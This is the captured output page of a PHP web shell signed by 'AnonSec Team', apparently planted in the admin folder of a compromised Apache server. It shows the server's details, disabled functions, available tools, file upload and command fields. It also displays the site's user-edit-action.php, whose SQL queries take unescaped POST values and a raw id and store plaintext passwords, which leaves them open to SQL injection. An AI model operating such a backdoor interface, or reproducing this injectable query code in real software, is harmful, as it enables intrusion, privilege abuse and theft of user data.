Dre4m Shell
Server IP : 127.0.0.2  /  Your IP : 13.59.91.46
Web Server : Apache/2.4.18 (Ubuntu)
System :
User : www-data ( )
PHP Version : 7.0.33-0ubuntu0.16.04.16
Disable Function : disk_free_space,disk_total_space,diskfreespace,dl,exec,fpaththru,getmyuid,getmypid,highlight_file,ignore_user_abord,leak,listen,link,opcache_get_configuration,opcache_get_status,passthru,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,php_uname,phpinfo,posix_ctermid,posix_getcwd,posix_getegid,posix_geteuid,posix_getgid,posix_getgrgid,posix_getgrnam,posix_getgroups,posix_getlogin,posix_getpgid,posix_getpgrp,posix_getpid,posix,_getppid,posix_getpwnam,posix_getpwuid,posix_getrlimit,posix_getsid,posix_getuid,posix_isatty,posix_kill,posix_mkfifo,posix_setegid,posix_seteuid,posix_setgid,posix_setpgid,posix_setsid,posix_setuid,posix_times,posix_ttyname,posix_uname,pclose,popen,proc_open,proc_close,proc_get_status,proc_nice,proc_terminate,shell_exec,source,show_source,system,virtual
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/html/admin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ HOME SHELL ]     

Current File : /var/www/html/admin/user-edit-action.php
<?php
require_once('include/db-config.php');
session_start();
$id=$_POST['id'];


$_SESSION['name']=$name=mysqli_real_escape_string($conn,$_POST['name']);
$_SESSION['login']=$login=mysqli_real_escape_string($conn,$_POST['login']);
$pwd=mysqli_real_escape_string($conn,$_POST['pwd']);
$_SESSION['status']=$status=mysqli_real_escape_string($conn,$_POST['status']);

$date=date("Y-m-d");

$_SESSION['c_home']= $c_home=$_POST['c_home'];
$_SESSION['s_list']=$s_list=$_POST['s_list'];
$_SESSION['e_list']=$e_list=$_POST['e_list'];
$_SESSION['c_land']=$c_land=$_POST['c_land'];
$_SESSION['s_new_spons']=$s_new_spons=$_POST['s_new_spons'];
$_SESSION['e_new_email_message']=$e_new_email_message=$_POST['e_new_email_message'];
$_SESSION['c_shop']=$c_shop=$_POST['c_shop'];
$_SESSION['s_sess_list']=$s_sess_list=$_POST['s_sess_list'];
$_SESSION['e_monthly']=$e_monthly=$_POST['e_monthly'];
$_SESSION['c_seo']=$c_seo=$_POST['c_seo'];
$_SESSION['s_new_sess']=$s_new_sess=$_POST['s_new_sess'];
$_SESSION['e_email']=$e_email=$_POST['e_email'];
$_SESSION['e_new_email']=$e_new_email=$_POST['e_new_email'];
$_SESSION['i_list']=$i_list=$_POST['i_list'];
$_SESSION['f_list']=$f_list=$_POST['f_list'];
$_SESSION['i_export']=$i_export=$_POST['i_export'];
$_SESSION['f_new_file']=$f_new_file=$_POST['f_new_file'];
$_SESSION['r_seminar']=$r_seminar=$_POST['r_seminar'];
$_SESSION['p_list']=$p_list=$_POST['p_list'];
$_SESSION['a_list']=$a_list=$_POST['a_list'];
$_SESSION['u_list']=$u_list=$_POST['u_list'];
$_SESSION['p_new']=$p_new=$_POST['p_new'];
$_SESSION['a_new']=$a_new=$_POST['a_new'];
$_SESSION['u_new']=$u_new=$_POST['u_new'];
$_SESSION['p_shipping']=$p_shipping=$_POST['p_shipping'];
$_SESSION['a_category']=$a_category=$_POST['a_category'];
$_SESSION['p_prdct_qty']=$p_prdct_qty=$_POST['p_prdct_qty'];
$_SESSION['a_relation']=$a_relation=$_POST['a_relation'];
$_SESSION['p_coupon']=$p_coupon=$_POST['p_coupon'];
$_SESSION['p_liscence']=$p_liscence=$_POST['p_liscence'];
$_SESSION['o_change']=$o_change=$_POST['o_change'];
$_SESSION['p_meeting']=$p_meeting=$_POST['p_meeting'];
$_SESSION['o_view']=$o_view=$_POST['o_view'];

$qry=mysqli_num_rows(mysqli_query($conn,"select UserID from maintrainer_useraccounts where UserID='$login' and ID!='$id'"));
if($qry>0)
{
	$url='location: user-edit.php?r=1&id='.$id;
	header($url);
}
else 
{
$query="update maintrainer_useraccounts set UserName='$name',UserID='$login',Password='$pwd',Status='$status',EditedDate='$date',
       c_home_page='$c_home',c_landing_page='$c_land',s_list='$s_list',e_list='$e_list',s_new_spons='$s_new_spons',e_new_email_message='$e_new_email_message',
       c_shop='$c_shop',s_sess_list='$s_sess_list',e_monthly='$e_monthly',c_seo='$c_seo',s_new_sess='$s_new_sess',e_email='$e_email',e_new_email='$e_new_email',
       i_list='$i_list',f_list='$f_list',i_export='$i_export',f_new_file='$f_new_file',r_seminar='$r_seminar',p_list='$p_list',a_list='$a_list',
       u_list='$u_list',p_new='$p_new',a_new='$a_new',u_new='$u_new',p_shipping='$p_shipping',a_category='$a_category',p_prdct_qty='$p_prdct_qty',
       a_relation='$a_relation',p_coupon='$p_coupon',p_liscence='$p_liscence',o_change='$o_change',p_meeting='$p_meeting',o_view='$o_view' where ID=".$id;
$result=mysqli_query($conn,$query);
if($result)
{
$url='location: user-list.php?r=2';
	header($url);
}
else
{
	echo "Sql Error";
}
}
?>

Anon7 - 2022
AnonSec Team